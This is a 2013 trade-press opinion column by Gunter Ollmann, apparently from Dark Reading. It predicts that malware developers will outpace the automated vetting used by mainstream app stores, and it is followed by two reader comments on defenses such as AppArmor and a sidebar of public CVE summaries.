Attacks/Breaches
10/7/2013
09:20 AM
Gunter Ollmann
Gunter Ollmann
Commentary
Connect Directly
RSS
E-Mail
50%
50%

Distributing Malware Through Future App Stores

Difficult times ahead for app markets as professional malware developers ramp their evasion techniques

As corporate networks continue to succumb to the bleating call of "bring your own device" (BYOD) gadgets, more security teams are questioning the security and integrity of the application markets that drive the adoption of these devices. While the vast majority of corporations have heard the dangers of rogue app markets and the malware plague that infests them, many organizations continue to search for confirmation that the "legitimate" app stores are safe.

Numerous antivirus vendors have found it advantageous to monitor the many fledgling app stores and markets around the world and continue to publish their findings as they relate to the unique pieces of malware being uncovered. While the numbers follow a not-unexpected exponential growth rate, it remains unclear whether there is a significant (or even noticeable) threat to corporate entities -- especially if this maliciousness is almost entirely attributed to the aforementioned rogue markets.

It is inevitable that malware authors, and the criminal organizations that profit from malware's proliferation, will continue to pursue their targets via their portable and personal devices in order to breach an organization. The first and foremost defense against these attacks is likely to continue to be the app markets themselves -- at last for the short term. However, as malicious app developers are pushed and incented to innovate beyond this first generation of mobile malware in order to be reliably distributed from the primary app markets, it is inevitable that businesses will fall prey to more malware that targets their BYOD install base.

The primary app markets are well-positioned to limit the introduction of malicious software into their application portfolio. They all employ a barrage of technologies and service conditions designed to scan new applications (and their updates) for malicious code and unwanted actions. Many of the methods employed, by necessity, remain blackbox systems to both their customers and authorized app developers. While the primary app market providers will continue to improve their inspection techniques in the yo-yo battle against malicious developers, it is inevitable that they will lose that battle. It's just a matter of time, unfortunately.

Some may argue that the blackbox inspection engines of the app market providers have the upper hand. I'd argue thatif current corporate code inspection and reviewing technologies are anything to go by, then the automated techniques used for testing the security and integrity of mobile applications will always succumb to an even marginally informed or persistent developer.

Today's commercial code analysis and inspection tools are fantastic for automatically plowing through millions of lines of code and flagging every poor coding choice that has historically been classed as a security concern. But, similar to the problems encountered with IDS and antivirus scanners, they're limited to pedantically detecting threats they've encountered before and are easily evaded when a modicum of obfuscation is employed. Even forgetting about the security angle for a moment -- speak with any experienced developer who has worked for a major software vendor about what they think of the automated build checkers and QA systems, and they'll happily tell you of the small tricks they had to employ to bypass those "hurdles to productivity."

While automated security reviews can possibly catch many of the common coding flaws and a growing list of obfuscation techniques, they are not capable of interpreting every logic jump or nestled function call for deliberate maliciousness. One recent example can be found in the paper by GA Tech researchers Tielei Wang and Billy Lau, titled "Jekyll on iOS: When Benign Apps Become Evil," in which they deliberately inserted exploitable bugs into the code that was submitted to the Apple app store. The automated analysis platform employed by Apple to identify malicious apps had no realistic chance of identifying this evasion vector and, inevitably, the malicious app was published to the store and could have been installed by a new stable of victims.

The tricks employed by malicious app developers will grow in sophistication faster than even the most advanced app inspection and approval platforms can counter them.

For the time being, you may as well make the most of the fact that the primary app stores are largely ahead of the threat -- but don't become complacent. The advantage will soon fall to the attackers, and we can expect their mobile malware to become more prevalent in the markets we trust the most. Precisely when that'll happen and when we'll feel the pain remains uncertain, but a year or so is likely to be a good guess.

Gunter Ollmann, CTO, IOActive inc.

Gunter Ollmann serves as CTO for IOActive Inc. where he is responsible for the strategic vision of the security services portfolio, driving new research areas and bringing new services to market. With over two decades in the information security arena, Gunter has stared down ... View Full Bio

Comment  | 
Print  | 
More Insights
Comments
Newest First  |  Oldest First  |  Threaded View
Peter Fretty
50%
50%
Peter Fretty,
User Rank: Apprentice
10/29/2013 | 10:54:14 PM
re: Distributing Malware Through Future App Stores
Such an important topic, especially as mobility continues to intensify and downloaded apps become a part of the organization fabric running business networks today. Beating malware is something that takes a strategy that utilizes a combination of solid tools including device protection programs, UTM appliances (i.e. Sophos, etc. as well as an education based platform to continually educate the user base of best practices.

Peter Fretty
macker490
50%
50%
macker490,
User Rank: Ninja
10/16/2013 | 11:16:41 AM
re: Distributing Malware Through Future App Stores
this is a topic that needs some serious thought and planning . we know there are disreputable software makers out there who attempt to put malware loaded apps up on the program libraries so they are available for download

our reponse must consider as well that legitimate well-intentioned software builders can load malware just as easily and without knowing it -- when the malware originates from a software library used is assembiling a software product

software makers will need a zero-defects quality control process to fight this. remember: zero defects is not something you get -- it's something you do: you make sure what you are shipping is defect free -- and assume responsibility for that .

in Linux we have a tool known as AppArmor. Using this I can create a profile that will limit what an application can access . this is a very important concept.

remember: when you open your computer and LOGON it's then just you, and your computer. but when you open your web browser it becomes you, and the web author. not just of the page you are browsing -- but every page the active page links to .

you can use AppArmor to restrict what an app can access . this can be a game-changer . no longer does an app have all the same access you do -- it can be restricted and allowed to access only those areas that are appropriate for it.

we will probably not be able to completely eliminate malware from the software distribution system . but an infected app should not be able to compromise your entire computer . a more traditional approach to computer security, such as adding app armor, as well as generally not allowing root access -- will be a huge step in the right direction . the old approach taken in the "PC" -- is an un-mitigated disaster.
Register for Dark Reading Newsletters
White Papers
Flash Poll
Current Issue
Cartoon
Video
Slideshows
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2014-2627
Published: 2014-08-01
Unspecified vulnerability in HP NonStop NetBatch G06.14 through G06.32.01, H06 through H06.28, and J06 through J06.17.01 allows remote authenticated users to gain privileges for NetBatch job execution via unknown vectors.

CVE-2014-3009
Published: 2014-08-01
The GDS component in IBM InfoSphere Master Data Management - Collaborative Edition 10.0 through 11.0 and InfoSphere Master Data Management Server for Product Information Management 9.0 and 9.1 does not properly handle FRAME elements, which makes it easier for remote authenticated users to conduct ph...

CVE-2014-3302
Published: 2014-08-01
user.php in Cisco WebEx Meetings Server 1.5(.1.131) and earlier does not properly implement the token timer for authenticated encryption, which allows remote attackers to obtain sensitive information via a crafted URL, aka Bug ID CSCuj81708.

CVE-2012-6651
Published: 2014-07-31
Multiple directory traversal vulnerabilities in the Vitamin plugin before 1.1.0 for WordPress allow remote attackers to access arbitrary files via a .. (dot dot) in the path parameter to (1) add_headers.php or (2) minify.php.

CVE-2014-2970
Published: 2014-07-31
** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2014-5139. Reason: This candidate is a duplicate of CVE-2014-5139, and has also been used to refer to an unrelated topic that is currently outside the scope of CVE. This unrelated topic is a LibreSSL code change adding functionality ...

Best of the Web
Dark Reading Radio